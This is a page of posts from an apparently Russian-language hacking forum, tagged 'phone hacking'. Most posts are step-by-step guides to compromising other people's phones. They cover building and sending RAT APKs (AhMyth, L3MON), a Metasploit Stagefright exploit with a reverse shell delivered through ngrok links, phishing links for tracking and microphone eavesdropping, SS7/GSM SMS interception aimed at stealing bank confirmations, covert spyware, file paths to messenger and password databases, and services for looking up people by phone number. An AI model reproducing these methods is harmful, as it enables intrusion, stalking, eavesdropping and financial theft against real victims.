Jump to content
Новости и объявления.
  • Уважаемые гости. При посещении нашего сайта, просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.д. Рекомендуем посетить разделы: "Общение, Коммерческий раздел, Услуги Хакеров и статьи, Отзывы о сайте и пользователях, Черный список" и другие разделы нашего сайта. ***ВНИМАНИЕ*** При обращении за помощью, просим быть внимательными, на сайте есть, как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант сервиса. xakervip.com
  • Взлом
  • Взлом
  • Гарант-сервис
  • Реклама на форуме

Search the Community

Showing results for tags 'взлом телефона'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Admin
    • Hacker Forum news.
    • Transactions are the guarantor of the service.
    • A section for resolving controversial issues.
  • Общение.
    • A section for resolving controversial issues.
    • A section for resolving controversial issues.
  • Коммерческий раздел.
    • A trading platform on a hacker site.
    • Services related to communication, telephony, number substitution, etc.
    • Promotion, promotion, SEO, etc.
    • Sale-Purchase Of Cryptocurrencies.
  • Практика взлома, информация и т.д
    • Web vulnerability.
    • Social network
    • E-Mail (Mail).
    • Malware.
    • Soft Hacker
    • Freebie (I'll give it away for free).
    • Help with various software problems and computer problems.
  • Безопасность.
    • Help with malware infection.
    • Punishment for hacking.
    • Secure connection with IP address substitution and security articles.
  • XAKER (Hacker Services and articles).
    • Services of professional hackers (HACKING SERVICES)
    • Hacking services (REFUSED VERIFICATION).
    • About professional hackers (ARTICLES AND STORIES).
    • Requests for help.
  • Other topics, miscellaneous.
    • Reviews of hackers/programmers who helped you.
    • Reviews about our site and suggestions to change your opinion.
    • Reviews of third-party resources.
  • Реклама на форуме.
    • Advertising on the forum.
  • Черный список. (BLACK LIST).
    • BLACKLIST. Scammers and would-be hackers.
    • What methods scammers use to deceive users (Articles).
  • Разное.
    • Other topics, miscellaneous.
    • Other topics, miscellaneous.

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Сайт


ICQ


Yahoo


Skype


Город


Интересы

  1. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как вы можете без интернета посмотреть карту местности. Приложение-навигатор должно обладать особыми характеристиками, чтобы помочь сэкономить бесценный трафик и оградить тебя от судорожного поиска Wi-Fi спота в тот момент, когда ты уже потерялся. Maps.me - быстрые, подробные и полностью автономные карты с пошаговой навигацией. Доступны для iOS и Android. Скачивайте путеводитель и карты разных городов мира и пользуйтесь ими офлайн. Карте не требуется подключение к интернету, чтобы определить ваше местонахождение, автоматически определяет GPS координаты для построения наиболее оптимального маршрута. Офлайн-навигация доступна для пяти видов транспорта. Будьте осторожны, продолжительное использование GPS в фоновом режиме может значительно сократить время работы батареи. Очень удобное приложение, если вам срочно необходимо узнать свое местоположение, а интернет у вас отсутствует. Поэтому попробуйте, возможно оно вам пригодится. Сервис Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  2. Приветствую, хакеры! В данной статье собраны несколько секретных Android-папок, которые могут вам пригодиться. Контакты пользователя: /data/data/com.android.providers.contacts/databases/contacts2.db Данные смс сообщений: /data/data/com.android.providers.telephony/databases/mmssms.db История звонков: /data/data/com.android.providers.contacts/contacts.db Журнал событий Android: /data/com.sec.android.provider.logsprovider/databases/logs.db История веб браузера: /data/data/com.android.browser/databases/browser2.db Истории браузера Chrome: /data/data/com.android.chrome/app_chrome/Default/Archived History /data/data/com.android.chrome/app_chrome/Default/History Логины и пароли водимые в браузере Chrome: /data/data/com.android.chrome/app_chrome/Default/Login Data Браузер Firefox. /data/data/org.mozilla.firefox/files/mozilla Сообщения Facebook: /data/data/com.facebook.katana/databases/threads_db2 /data/data/com.facebook.orca/databases/threads_db2 Контакты WhatsApp: /data/data/com.whatsapp/databases/wa.db Звонки WhatsApp: /data/data/com.whatsapp/databases/msgstore.db Сообщения WhatsApp: /data/data/com.whatsapp/databases/msgstore.db Сообщения и звонки для Skype: /data/data/com.skype.raider/files//main.db Viber хранит отдельно сообщения и звонки: /data/data/com.viber.voip/databases/viber_data Сообщения Viber: /data/data/com.viber.voip/databases/viber_messages Telegram: /data/data/org.telegram.messenger/files/cache4.db Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  3. Приветствую, хакеры! В данной небольшой статье я хочу рассказать о том, как моментально удалить все данные с телефона. Иногда данные на телефоне, — фотографии, номера, приложения, — нужно удалить быстро. Ситуации бывают разные: выбивают дверь сотрудники СОБР, принял решение покончить жизнь самоубийством, предлагают 1.000.000$ в обмен на смартфон и дают минуту на принятие решения. Но обычно все куда прозаичнее: телефон вот-вот перейдёт новому владельцу. И ему явно ни к чему знать все подробности твоей личной жизни... чтобы не было, как в фильме «Текст». Extirpater — Android-приложение, которое быстро стирает все данные с телефона. Без возможности восстановления! Механика необычная: сначала свободное на смартфоне место заполняется случайными файлами, а затем вся «коллекция» одним махом отправляется в бездонную корзину. Bye-bye! «А зачем вся эта суета? Есть ведь сброс до заводских настроек!» — скажешь ты. Есть! Вот только на полную гарантию удаления ВСЕХ данных при таком раскладе рассчитывать не приходится. В частности речь о фотографиях. Проверено! Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  4. Приветствую, хакеры! В данной небольшой статье я хочу рассказать о том, как взломать и управлять смартфоном удаленно. AhMyth RAT - это приложение с открытым исходным кодом, доступное только в бета-версии. Инструмент нацелен на пользователей Windows, но шрифты AhMyth также можно загрузить с GitHub для UNIX-подобных платформ, отмечают эксперты по мобильному взлому. Установка: Устанавливаем Java Скачиваем AhMyth RAT Создаём вредоносный APK: Чтобы создать файл APK для Android, откройте вкладку APK Builder. В поле IP-адреса источника необходимо ввести IP-адрес атакующей машины. В поле Source port вы можете указать порт, который машина зарезервирует для прослушивания соединений (порт по умолчанию - 42,474). Затем нажмите кнопку «Создать»; по умолчанию зараженный файл сохраняется в следующей папке: C:UsersAhMythOutput Готово! Теперь осталось отправить жертве данный APK файл. Вот таким простым способом вы можете взломать и получить полный доступ над каким-либо смартфоном, поэтому пользуйтесь пока данный метод работает. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  5. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как можно удалить все данные с Android, если вы потеряли телефон. Данные в смартфоне — важнее самого устройства. Все банковские карты, важные документы и доступ к соцсетям хранятся в телефоне. Если вдруг вы потеряете девайс или его у вас украдут — кто-то получит всю эту информацию. Обезопасьте себя заранее, чтобы потом не жалеть. Find My Device - приложение заблокирует смартфон, узнает его местоположение и удалит все данные, если с ним что-то случится. Помимо этого, можно установить новый пароль, включить громкий звук и отправить сообщение на телефон. Входим через Google, даём права администратора и все фичи доступны на удобной панели. Если вы потеряли телефон — установите приложение на другое устройство и войдите в него. Find My Device поможет найти не только смартфон, но и планшет с часами. И помните: если на потерянном гаджете нет интернета и заряда, то уже никакое приложение не поможет. Поэтому если вы беспокоитесь за сохранность своих данных, то позаботьтесь о них сейчас и установите данное приложение. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  6. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как можно взломать и получить удаленный доступ к телефону. AhMyth RAT - это приложение с открытым исходным кодом, доступное только в бета-версии. Инструмент нацелен на пользователей Windows, но шрифты AhMyth также можно загрузить с GitHub для UNIX-подобных платформ, отмечают эксперты по мобильному взлому. Установка: Устанавливаем Java Скачиваем AhMyth RAT Создаём вредоносный APK: Чтобы создать файл APK для Android, откройте вкладку APK Builder. В поле IP-адреса источника необходимо ввести IP-адрес атакующей машины. В поле Source port вы можете указать порт, который машина зарезервирует для прослушивания соединений (порт по умолчанию - 42,474). Затем нажмите кнопку «Создать»; по умолчанию зараженный файл сохраняется в следующей папке: C:\Users\ваш_юзер>\AhMyth\Output Готово! Теперь осталось отправить жертве данный APK файл. Это отличный и эффективный способ для взлома любого телефона на базе Android. Кроме того, с помощью него очень удобно управлять устройством удаленно. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  7. Приветствую, хакеры! В данной небольшой статье хочу рассказать вам о том, как бесплатно скрыть свой номер. Скрывать свой номер во время звонка очень полезно, чтобы сохранить свою анонимность. Например, вы хотите позвонить продавцу на Авито, но не хотите светить свой номер. Ещё один лайфхак: так вы дозвонитесь даже до номера, который вас заблокировал. На iPhone всё очень просто: открываем настройки, выбираем «Телефон» и отключаем «Показ номера (Show My Caller ID)». Теперь, когда вы кому-нибудь позвоните, человек увидит надпись «No Caller ID» или «Неизвестный абонент». Ваш настоящий номер по-прежнему увидят спецслужбы или сотовый оператор, но сам абонент не сможет посмотреть. Hide My Number - т.к на Android нет такой встроенной функции, но эту проблему мы решим с помощью этой программы. С ее помощью вы спрячете свой номер во время звонка — просто каждый раз звоните через приложение. Однако используйте его на свой страх и риск: пользователи часто жалуются на последующие лаги в работе телефона. Безопаснее юзать эту фичу на iPhone. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  8. Приветствую, хакеры! В данной небольшой статье мы поговорим о том, как при помощи всего-лишь одной ссылки получить полный контроль над чужим устройством. Поможет нам в этом специальная утилита Metasploit, которая прекрасно справляется с уязвимостями Android старых версий. Приступим: 1. Первым делом устанавливаем нашу утилиту в Termux: update apt upgrade pkg install unstable-repo pkg install Metasploit 2. После этого запускаем утилиту: 3. Теперь, если Stagefright нет в Metasploit, то скачиваем его отсюда →ТЫК← и перекидываем в папку с эксплоитами. 4. После этого прописываем: msfconsole — открытие консоли use exploit/android/browser/stagefrightmp4tx3g64bit — подключение эксплоита set SRVHOST вашIP URIPATH / set PAYLOAD linux/armle/mettle/reversetcp set LHOST вашIP set VERBOSE true exploit -j — запуск эксплоита Для нас сгенерируется специальная ссылка. Заворачиваем её в ngrok, по желанию маскируем и отправляем жертве под любым предлогом. Когда жертва по ней перейдёт, мы получим удалённый доступ к устройству. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  9. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о небольшом лайфхаке, который позволит отключить рекламу Вконтакте и поэтому не платить за музыка вообще. К сожалению, данный лайфхак работает только на iOS 1. Простой способ избавить себя от танцев с бубном — купить подписку. 2. Но если вы не ищете простых путей, есть классный лайфхак, который прикрыли для Android, но всё ещё оставили на iOS. Как это сделать: 1. Перейдите в меню "Настройки" → "Конфиденциальность". 2. В самом низу списка выберите раздел "Реклама". 3. Активируйте функцию "Ограничение трекинга". 4. Перезапустите приложение "ВКонтакте". После включения этой функции все рекламные вставки пропадут. Реклама во ВКонтакте подпадает под фильтры целевой рекламы, которые блокируются штатными функциями iPhone. На Android такой функции нет. Раньше было секретное меню, которое открывалось через код на телефоне (#*#856682583#*#) и активировало функцию "Отключить рекламу", но теперь её нет. Поздравляю, вы обладатель бесплатной музыки ВК. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  10. Приветствую, хакеры! В данной небольшой статье я расскажу вам о том, как заблокировать доступ к микрофону смартфона. Прямо сейчас и во время звонков другие приложения могут прослушивать вас, ведь когда-то вы дали им доступ к микрофону телефона. Чтобы навсегда избавиться от прослушки, есть полезное приложение — Micro Guard FREE для Android. Оно надёжно блокирует микрофон, чтобы никакие приложения не получили к нему доступ. В отличие от альтернатив, блокировщик защищает даже от шпионского ПО и требует минимального количества разрешений, поэтому это будет лучшим выбором среди подобных приложений. Чтобы воспользоваться этим методом, необходимо: Скачать приложение из Google Play. Открыть, передвинуть ползунок в режим «ON» и нажать на «Поиск шпионских программ». Затем нажать на «Устранить все проблемы». Разрешить включить функцию «Deep detective». Она поможет фиксировать попытки получить доступ к микрофону без вашего ведома. На iOS есть хорошая альтернатива — McAfee Mobile Security. Помимо других фич, там также есть блокировка микрофона. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  11. Приветствую, хакеры! В данной небольшой статье я хочу рассказать о том, как можно установить слежку за человеком с помощью ссылки. Trape – OSINT инструмент, который позволяет отслеживать и выполнять атаки социальной инженерии в режиме реального времени. Trape создает фишинг ссылку, и через нее следит за пользователем. Благодаря данному инструменту можно получить такую информацию как: IP, локация, ОС. Также вы сможете запускать удаленно js скрипты, загружать файлы на пк. Можно будет узнать на каких сервисах зарегестрирован пользователь. Установка: $ apt update -y $ apt upgrade -y $ apt install python $ apt install git $ git clone https://github.com/jofpin/trape.git Запуск: $ cd trape $ pip3 install -r requirements.txt $ python3 trape.py --url --port 8080 Запуск(Пример): $ python3 trape.py --url http://example.com --port 8080 Мы получим следующее: 1. Фишинг ссылку. 2. Ссылку на админ панель. 3. Пароль для входа в админ панель Отличная программа для установки базовой слежки за человеком, не требует никаких специфических навыков. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  12. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам об интересной подборке сервисов, которые позволяют узнать нам достаточно приличный объём информации о пользователе, имея на руках только номер его сотового телефона. Сервисы: 1. Lampyre (https://lampyre.io/) - веб-версия поиска по аккаунтам и телефонной книге. 2. Getcontact (https://www.getcontact.com/ru/) - поиск информации о том, как записан номер в контактах. 3. Avinfo Guru (https://avtobot.net/avinfo-guru-prilozhenie) - пробиваем владельца авто по телефону. 4. Telefon Stop-list (http://telefon.stop-list.info/) - поиск номера по всем ресурсам. 5. Rosfirm (https://www.rosfirm.ru/) - поиск ФИО, прописки, адреса. Но нужно знать город. 6. Spravnik (https://spravnik.com/) - поиск по городскому номеру, находит ФИО и адрес. Все эти сервисы могу быть для вас очень полезными. Ведь эти сервисы – самый быстрый способ пробива практически любого номере телефона. Поэтому, пользуйтесь, пока возможно, никаких особенных навыков для этого не нужно. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  13. Приветствую, хакеры! В данной небольшой статье я хочу с вами поделиться облачным пакетом удалённого управления Android под названием L3MON. L3MON - это облачный пакет для удалённого управления Android. Установка: $ apt install nodejs npm $ npm install pm2 -g $ git clone https://github.com/D3VL/L3MON.git Использование: $ cd L3MON $ cd server $ npm install $ npm audit fix $ pm2 start index.js $ pm2 startup Теперь вам нужно изменить пароль на шифрование хэша MD5 и поместить его в файл конфигурации для защиты панели администратора. Вы можете изменить пароль в соответствии с приведенной ниже командой. $ echo -n "12345" | md5sum $ nano maindb.json Запустите localhost на браузере и введите имя пользователя «admin» и пароль «12345». Создайте APK вирус и отправьте её жертве. После того жертва запустить ваш вирус, у вас на localhost появится его устройство со всеми функциями доступа. Отличный метод взлома смартфона на Android. У этого способа есть огромный потенциал, а самое главное, что вам не потребуется огромного количества навыков, чтобы начать изучать подобный взлом. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  14. Приветствую, хакеры! Каждому из нас приходилось прибегать к помощи самозагружающихся дисков и USB-флешек. Случился ли сбой основной ОС, или понадобилось воспользоваться чужим ПК, выручит флешка с собственной операционной системой или инсталлятором ОС. Однако, если у тебя есть смартфон, флешка больше не нужна. С задачей загрузки ОС он справится сам. DriveDroid превращает смартфон в самозагружаемую флешку, которая будет запускать на подключенном компьютере любой указанный образ диска, будь то Windows, Linux или еще более экзотическая ОС. Это отличный инструмент для решения проблем, переустановки ОС и возможность всегда иметь под рукой собственную альтернативную ОС. Использовать DriveDroid просто. Он не требует заранее искать и скачивать образы или обладать какими-то техническими знаниями. Все необходимое приложение сделает само, но для начала ему надо пройти инициализацию и определить, совместим ли технически смартфон с функцией загрузки ОС на ПК. Сразу после установки DriveDroid предложит определить техническую возможность и активировать нужный режим работы. Для этого приложению необходимо предоставить права root и подключить смартфон кабелем к компу. Даем права root и подключаем кабель, затем DriveDroid предложит выбрать предпочтительный метод работы. Standard Android работает в большинстве случаев. На последнем этапе надо указать, какой именно тип носителя ты увидел на компе: USB, CD-ROM или никакого. Это легко проверить через проводник. Выбираем метод работы и тип носителя, затем следует перезагрузить комп и попробовать загрузиться со смартфона. Если все прошло гладко, можешь начинать скачивать образы нужных дистрибутивов Linux прямо из приложения (от минималистичного SliTaz размером 35 Мбайт до полноценного Ubuntu). Впоследствии с каждого из них можно будет загрузиться, нажав на имени нужного образа, выбрать тип носителя (USB или CD), подключить смартфон кабелем и перезагрузить комп. Можно загрузить и Windows. Для этого необходимо скачать ISO-образ, положить его на SD-карту смартфона (или во внутреннюю память, если смартфон не поддерживает карточки) и затем выбрать его при добавлении новой ОС в DriveDroid
  15. Приветствую, хакеры! Технология Signalling System No.7 (SS7), которой уже около 40 лет, имеет критическую уязвимость. Благодаря этому мы можем получать доступ к аккаунтам соцсетей, онлайн-банкингу и прослушивать мобильные звонки, имея в распоряжении только номер телефона жертвы. Нам понадобится: Совместимый телефон на базе чипсета Calypso или MediaTekПрошивка OsmocomBBКабель и преобразователь USB-TTLКомпьютер под управлением Unix-like ОСИтак, мы имеем настроенную ОС со стеком OsmocomBB Запускаем стек программ osmocombb. Тут все просто. Предварительно подключаем наш кабель к компьютеру и пробрасываем его внутрь виртуалки. В виртуальной машине должно появиться устройство /dev/ttyUSB0. Далее подключаем ВЫКЛЮЧЕННЫЙ телефон к кабелю через аудиоджек. Открываем две консоли. В первой запускаем команду: #~/osmocom-bb-master/src/host/osmocon/osmocon -p /dev/ttyUSB0 -m c123xor -c ~/osmocom-bb-master/src/target/firmware/board/compal_e88/layer1.highram.bin И нажимаем красную кнопку включения телефона. Этой командой мы запускаем загрузку прошивки в телефон, а также открытие сокета, через который будет идти общение наших программ с телефоном. Это так называемый layer 1 модели OSI. Реализует физическое взаимодействие с сетью. Во второй консоли запускаем команду: #~/osmocom-bb-sylvain/src/host/layer23/src/misc/ccch_scan -a 774 -i 127.0.0.1 Эта команда реализует layer 2-3 модели OSI. А именно прослушивание эфира в поисках пакетов общего управления СССH (Common Control Channel). -a 774 — обозначает ARFCN, на котором мы вещаем. -i 127.0.0.1 — интерфейс, на который мы отправим наши пакеты. И запускаем Wireshark. Он все сделает за нас, а именно соберет необходимые пакеты в SMS, распарсит TPDU/PDU-формат и покажет нам все в удобочитаемом виде. Давайте перехватим, например, SMS для того что бы подтвердить вывод средств из чужого счет Сбербанка онлайн. Для удобства просмотра в Wireshark ставим фильтр на gsm_sms-пакеты, чтобы не засорять экран. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  16. Приветствую, хакеры! Чтобы получить доступ к контенту, заблокированному в вашем регионе, скрыть свою интернет-активность от провайдера и обеспечить максимальную конфиденциальность в сети, достаточно изменить на устройстве IP-адрес. Рассказываем, как это сделать на Android-смартфоне. 1. Смена региона Регион проживания можно сменить как на самом Android, так и в Google Play. В первом случае откройте настройки, затем перейдите в раздел расширенных настроек и выберите пункт Регион.Выбирайте любую страну вручную или в поисковой строке Чтобы сменить регион через Google, откройте приложение Play Market, затем нажмите на круглый значок профиля в правом верхнем углу. После этого перейдите в Настройки/Общие/Настройки аккаунта и устройства и укажите новую страну. В течение 48 часов изменения вступят в силу Однако у последнего способа есть недостатки. Например, менять страну таким образом можно только один раз в год. Также для подтверждения придется ввести новые платежные данные, а некоторые подписки могут стать недоступными. 2. VPN Простой способ сменить IP-адрес — использование виртуальных частных сетей. Кстати, с их помощью можно даже изменить свой IP-адрес на IP-адрес определенной страны. Это удобно, если вам нужен новый IP для доступа к контенту из определенного региона. Общая инструкция по применению VPN очень проста: Найдите приложение VPN в магазине Google Play Скачайте его и авторизуйтесь Нажмите ПодключитьГотово, Вы изменили свой IP. Использование VPN — самый простой способ изменить свой IP-адрес 3. Браузер Tor Если вы хотите знать, как изменить свой IP-адрес на Android исключительно для маскировки вашего фактического местоположения, почему бы не использовать Tor? Это будет работать только для браузера, а не для приложений, но ваш IP-адрес будет изменен, а при длительном сеансе просмотра даже несколько раз. Найдите браузер Tor в магазине Play Market Скачайте и установите приложение Используйте для веб-серфинга новый браузерКаждый раз, когда вы выходите в интернет через браузер Tor, у вас будет другой IP-адрес.
  17. Приветствую, хакеры! Чтобы увеличить привлекательность смартфонов, производители ставят на них как можно больше разных программ. Это понятно. Просто берём и удаляем ненужное… Стоп. Оказывается, некоторые программы невозможно удалить. Например, на отдельных моделях Samsung невозможно удалить Facebook (есть только опция 'disable'). Говорят, на Samsung S9 вдобавок предустановлены «неудаляемые» приложения Microsoft. Очень редко встречаются примеры моделей, на которых нет лишних программ. Например, когда вышел первый iPhone, то компания Apple жёстко зафиксировала пакет установленных приложений, поэтому оператор AT&T не смог добавить туда свой привычный мусор. В принципе, по такой логике и многочисленные приложения от Apple на iPhone можно считать ненужным мусором. Если быть точным, на iPhone предустановлены 42 приложения, не все из которых легко удалить. На Android же предустановлено 29 приложений, и тоже некоторые из них не удаляются стандартными средствами
  18. Приветствую, хакеры! На сегодняшний день есть достоверный способ отличить ваш сотовый от любого другого – это уникальный идентификационный номер или IMEI. Благодаря ему можно проверить смартфон на подлинность и даже определить местонахождение включенного гаджета (такие полномочия имеют сотрудники полиции). Российские мошенники построили целый бизнес на IMEI чужих смартфонов. Излюбленные жертвы – люди с сайтов объявлений, которые решили продать свой гаджет. Завязывается разговор о продаже, в котором преступники используют стандартный набор фраз, которые используются в общении с покупателями. Какой телефон, сколько ему лет, есть ли у него проблемы с экраном или нет. Бдительность усыпляют стандартные вопросы. В этот момент мошенник начинает делать вид,что готов купить смартфон. А затем между делом интересуется IMEI продаваемого устройства. Интерес к данному вопросу объясняется просто – необходимо проверить, является ли данный гаджет оригинальным, и не находится ли он в базе краденых. Ведь ни для кого не секрет что в продаже есть много поддельных телефонов и телефонов, которые были украдены, поэтому данный вопрос не будет вызывать подозрений. Продавец называет мошеннику IMEI мобильного телефона. После чего преступник скрывается с радаров. Затем появляется снова, чтобы заявить, что самолично внес идентификационный номер в базу краденных устройств. А если вы хотите, чтобы он оттуда исчез, то вам придется раскошелиться. В этом случае продажа смартфона будет значительно затруднена, ведь любой потенциальный покупатель сможет свериться с открытыми базами в интернете. Здесь стоит сделать ремарку, что злоумышленник не «берет на понты», он действительно внес IMEi устройства в базу краденых. Это легко проверить, а ссылки в качестве доказательства преступники высылают сами. Базы краденых телефонов находятся в открытом доступе, и каждый владелец может внести туда IMEI устройства, которое у него увели. Однако данные в базах никто не модерирует от слова совсем, так что IMEI телефона на подобных сайтах действительно может доставить неприятностей.
  19. Приветствую, хакеры! Расскажу вам про довольно старый, но всё ещё актуальный трюк с телефоном. Скажу, что пол минуты на то, чтобы вытащить данные, нам не хватит, так как информации много. Итак, для начала разберём все возможные пути к базам с информацией. Воспользуемся утилитой Sqlitebrowser. Софт доступен на несколько OC. Телефонная книга /data/data/com.android.providers.contacts/databases/contacts2.db SMS,MMS сообщения /data/data/com.android.providers.telephony/databases/mmssms.db Календарь /data/com.android.providers.calendar/databases/calendar.db Журнал событий /data/com.sec.android.provider.logsprovider/databases/logs.db Данные владельца устройства /data/system/users/0/accounts.db История веб-браузера /data/data/com.android.browser/databases/browser2.db История веб-браузера Chrome /data/data/com.android.chrome/app_chrome/Default/History /data/data/com.android.chrome/app_chrome/Default/Archived History Логины и пароли веб-браузера Chrome /data/data/com.android.chrome/app_chrome/Default/Login Data История веб-браузера Firefox /data/data/org.mozilla.firefox/files/mozilla Сообщения Facebook /data/data/com.facebook.katana/databases/threads_db2 /data/data/com.facebook.orca/databases/threads_db2 Оповещения Facebook /data/data/com.facebook.katana/databases/notifications_db Данные о подключении wifi /data/misc/wifi/wpa_supplicant.conf Сообщения/звонки Skype /data/data/com.skype.raider/files//main.db Данные о сим картах /data/data/com.android.providers.telephony/databases/telephony.db Браузеры В базах данных с браузеров есть: закладки, история, поисковые запросы. Добавляем бд в софт и видим таблицы с результатами, по разным фильтрам Контакты и Звонки Получаем информацию о звонках и списки контактов. Загружаем базу с контактами и выбираем таблицу contacts, получаем список Далее грузим историю звонков(журнал звонков) Данные о WIFI Получаем имя SSID, PSK в текстовом виде, тип подключения/шифрования, приоритет. Информация предоставляется в текстовом формате для читабельности. Календарь В календаре мы можем увидеть какие либо праздники, напоминания нашей "жертвы". Загружаем базу С остальными базами, поступаем также, достав информацию с телефона, главное её правильно обработать, вы обязательно найдёте,что то полезное. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  20. Приветствую, хакеры! На данный момент есть две полноценные работающие программы-шпионы. Это WardenCam и TrackView. Принцип работы обеих программ аналогичный. Первая имеет некоторое преимущество, а именно: есть возможность подключения учетной записи в Dropbox, где можно хранить видео с телефона. Но такая программа не работает с некоторыми мобильными устройствами, например Nexus 7.А вот программа TrackView намного интереснее, она универсальна и подходит ко всем устройствам. Она не только может организовать видеонаблюдение с телефона, но и это полноценный шпион для полного контроля над устройством. Она дает возможность отследить месторасположение устройства, получить данные с камеры, даже управлять микрофоном. С одной стороны такими вещами заниматься запрещено, но с другой стороны – это способ контроля над телефоном. Например, если телефон оставить в машине, и ее угонят, то отследить перемещение автомобиля по GPS не составит проблем. Или с ее помощью следить за ребенком. А можно даже оставить в квартире в неприметном месте и следить за ней. Есть в ней еще одна полезная утилита: можно вести переговоры с другими устройствами подключенными к аккаунту .Как следить за человеком через телефон? Для начала нужно скачать с Play Market саму программу. TrackView нужно установить именно на приложение Android, за которым и нужно вести контроль. Это может быть любое устройство, которое имеет встроенную веб камеру. Можно скачать такую программу для продуктов Apple или даже для Windows. Такие дистрибутивы есть на сайте разработчика программы. Кроме того, для контроля нужно иметь одинаковые аккаунты для разных устройств, которые зарегистрированы на Гугл. Это может быть почта, Youtube, прочие сервисы. А самое главное, чтобы в каждом устройстве был активен и настроен интернет, Wi-Fi. Причем он должен быть включен постоянно. Как настроить программу шпион TrackView ? 1. После закачки и запуска TrackView нужно зайти на каждом устройстве в аккаунт и добавить устройство. 2. На каждом устройстве появится несколько функций: просмотр видео, управление микрофоном и управление месторасположением. 3. Во вкладке камера можно управлять не только изображением с веб камеры, но и архивировать данные, записывать видео или активировать микрофон для передачи голосовых сообщений. 4. Геолокация непосредственно подключена к картам Гугл. Устройство отображается или с помощью интернета, или через GPS. 5. С помощью звукового сигнала можно послать вызов на другое устройство. Кроме того, программа TrackView позволяет: просмотреть или запустить записанные файлы, настроить фильтры сообщений, запустить и настроить детекторы движения, прочие особенности. На самом деле, программа очень простая и удобная, интерфейс лёгкий рассчитан для чайника, поэтому проблем с установкой и активацией продукта не возникнет. Только нужно учитывать, что устройство постоянно должно быть активно, только так выйдет за ним следить. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации
  21. Сегодня поговорим о знакомом скрипте под названием "Seeker", созданный для поиска местоположения человека посредством перехода по ссылке. Также используется ngrok. Seeker использует HTML5, Javascript, JQuery и PHP для захвата информации об устройстве и геолокации с высокой точностью. Точность полученной информации - около 30 метров. На iPhone по какой-то причине точность местоположения составляет около 65 метров. Он размещает поддельный веб-сайт на Apache Server и использует Ngrok , которая запрашивает разрешение на размещение, и если пользователь ее разрешает, то мы получаем следующие данные: Долгота.Широта.Точность.Высота - не всегда доступна.Направление - доступно только в том случае, если пользователь движется.Скорость - доступна только в том случае, если пользователь движется.Наряду с информацией о местоположении мы также можем получить информацию об устройстве без каких-либо разрешений: Операционная система.Платформа.Количество ядер процессора.Объем оперативной памяти - приблизительные результаты.Разрешение экрана.Информация о GPU.Имя и версия браузера.Открытый IP-адресКод: Установка и запуск. git clone https://github.com/thewhiteh4t/seeker.git cd seeker/ chmod 777 install.sh ./install.sh Код: Запуск - python seeker.py Жертва переходит по сгенерированной ссылке и разрешает доступ к геолокации, после чего мы видим его местоположение. Сразу можно открыть google map. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  22. Сегодня поговорим о том, как имея в распоряжении один лишь компьютер с операционной системой Linux или смартфон с Termux’ом на борту, можно сделать полноценное прослушивающее устройство введя в консоли пару-тройку нехитрых команд. Внимание! Замечу, что эта статья написана только для образовательных целей. Мы никого ни к чему не призываем, только в целях ознакомления! Автор не несёт ответственности за ваши действия! Погнали! Инструкция Копируем с гитхаба скрипт sayhello: git clone https://github.com/Aaryan101/sayhello Переходим в соответствующий каталог: cd sayhello Выдаем разрешения: chmod +x sayhello.sh И запускаем скрипт для прослушки: bash sayhello.sh В появившемся окне указываем сервис для форварда (Ngrok 2), а затем выбираем куда будет вести редирект. По дефолту он отправляет жертву прямиком на ютубчик. Копируем сгенерированную ссылку. Далее включаем соображалку, думая под каким благовидным предлогом можно передать её жертве. В конце статьи я подкину вам идею. Если клиент на том конце разрешит доступ То в окне скрипта сразу забегают строки, оповещающие о сохранении файлов аудиозаписей. Прослушать их можно перейдя в каталог sayhello. Записи будут сохраняться до тех пор, пока вы не завершите работу скрипта нажав CTRL+C, либо не ребутните тачку. Жёсткий диск при этом забивается со скоростью света. Основная сложность этого метода заключается в том, как заставить жертву перейти по ссылке, да ещё и разрешить доступ к своему микрофону. Обычно хакеры используют для этого различные площадки с обучающими вебинарами. Т.е. падает вам на почту письмо, мол так и так мы такая-то академия или учебный центр, пройдите по ссылке для доступа к вебинару или онлайн-конференции. Естественно, при таком раскладе в голове обывателя не возникает сомнений в момент подтверждения доступа. Ведь в вебинаре нужно же как-то участвовать. Причём само мероприятие может быть вполне реальным. Вас редиректнут, вы зарегаетесь на фейковом сайте и всё вроде бы ОК. Однако в этот момент вы уже плотно попались на удочку и все ваши разговоры передаются прямиком хакеру. Поэтому будьте предельно бдительны, прежде чем переходить по каким-либо ссылкам. Вся информация 